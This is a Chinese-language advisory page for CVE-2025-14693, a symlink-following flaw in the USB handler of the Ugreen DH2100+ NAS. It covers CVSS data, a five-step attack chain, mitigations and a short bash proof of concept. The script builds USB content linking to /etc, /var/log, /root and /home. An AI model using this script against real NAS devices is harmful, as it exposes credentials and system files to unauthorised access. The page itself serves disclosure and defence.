CVE-2025-14693: Ugreen DH2100+ USB Handler符号链接跟随漏洞

漏洞信息

漏洞编号

CVE-2025-14693

漏洞类型

符号链接跟随(Symlink Following)

CVSS评分

6.2 中危

攻击向量

物理 (AV:P)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Ugreen DH2100+

漏洞概述

CVE-2025-14693是影响Ugreen DH2100+网络附加存储(NAS)设备的安全漏洞。该漏洞存在于设备的USB Handler组件中，攻击者可以通过物理接触设备，利用符号链接跟随(Symlink Following)技术来访问受限的系统资源。Ugreen DH2100+是一款流行的双盘位NAS设备，支持多种存储和备份功能。由于漏洞存在于USB处理模块，攻击者只需将带有恶意符号链接的USB设备连接到目标设备即可触发漏洞。此漏洞的CVSS评分为6.2，属于中等严重程度，但考虑到攻击复杂度低(AC:L)、无需用户交互(UI:N)且影响范围涵盖机密性、完整性和可用性三个安全属性，因此在实际环境中仍具有较高的利用价值。漏洞已在互联网上公开披露，相关的利用代码可能已被广泛传播。

技术细节

该漏洞的核心问题在于Ugreen DH2100+的USB Handler组件在处理USB存储设备时未能正确验证符号链接的目标路径。攻击者可以创建一个指向系统敏感目录(如/etc、/var/log或根目录)的符号链接，并将包含此符号链接的USB设备连接到目标NAS。当设备的USB Handler遍历USB设备内容时，会跟随这个恶意创建的符号链接，从而访问到本应受限的文件系统位置。这种符号链接跟随攻击可能导致以下后果：1) 读取敏感配置文件获取管理员凭据；2) 覆写系统关键文件导致拒绝服务；3) 在某些情况下可能实现权限提升。由于攻击需要物理接触设备(AV:P)，且需要高权限认证(PR:H)，但无需用户交互(UI:N)，攻击者可以在获得设备物理访问权限后快速完成 exploit。漏洞影响固件版本5.3.0及以下的所有Ugreen DH2100+设备。

攻击链分析

STEP 1

步骤1: 准备阶段

攻击者创建包含恶意符号链接的USB存储设备，将符号链接指向NAS系统中的敏感目录如/etc、/var/log等

STEP 2

步骤2: 物理接入

攻击者获得Ugreen DH2100+设备的物理访问权限，将准备好的USB设备插入NAS的USB端口

STEP 3

步骤3: 触发漏洞

设备的USB Handler组件自动检测并挂载USB设备，在遍历文件系统时跟随恶意符号链接

STEP 4

步骤4: 资源访问

通过符号链接跟随，攻击者可以访问本应受限的系统目录，读取配置文件、日志文件或系统凭据

STEP 5

步骤5: 权限滥用

攻击者利用获取的敏感信息进行进一步攻击，如修改系统配置、植入后门或执行拒绝服务攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-14693 PoC - Ugreen DH2100+ Symlink Following
# Description: Creates a malicious USB with symlink to sensitive directories

# Create a directory for the exploit USB content
mkdir -p usb_exploit
cd usb_exploit

# Create symlinks pointing to sensitive system directories
echo "Creating malicious symlinks..."
ln -sf /etc etc_link
ln -sf /var/log var_log_link
ln -sf /root root_link
ln -sf /home home_link

# Create a README file to document the exploit
cat > README.txt << 'EOF'
CVE-2025-14693 Exploit README
Target: Ugreen DH2100+ NAS
Vulnerability: Symlink Following in USB Handler

This USB device contains symbolic links that point to sensitive 
system directories on the target NAS device.

When connected to the vulnerable Ugreen DH2100+ device, the 
USB Handler component will follow these symlinks, potentially
exposing sensitive system files and configurations.

Attack Steps:
1. Connect this USB device to Ugreen DH2100+
2. Access the NAS web interface or SSH
3. Navigate to USB storage section
4. The system will follow symlinks to sensitive directories
5. Attacker can read/write to protected locations

Recommendation: Update to firmware version > 5.3.0
EOF

echo "PoC USB device content created successfully"
echo "Directory contents:"
ls -la
cd ..

影响范围

Ugreen DH2100+ 固件 <= 5.3.0

防御指南

临时缓解措施

由于该漏洞需要物理接触设备，建议采取以下临时缓解措施：1) 限制对NAS设备的物理访问，将设备放置在安全区域；2) 在不使用时封锁USB端口；3) 监控USB设备连接日志；4) 等待厂商发布官方固件更新后立即升级；5) 考虑使用网络隔离措施限制攻击面。虽然没有完美的临时缓解方案，但结合物理安全控制和固件升级可以有效降低风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14693
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14693
3 Details https://www.cvedetails.com/cve/CVE-2025-14693/
4 VulDB https://vuldb.com/cve/CVE-2025-14693
5 Link https://vuldb.com/?ctiid.336411
6 Link https://vuldb.com/?id.336411
7 Link https://vuldb.com/?submit.704646
8 Link https://vuldb.com/?submit.704657
9 Link https://www.notion.so/2bc6cf4e528a8083bf3fc6f7a953f0a1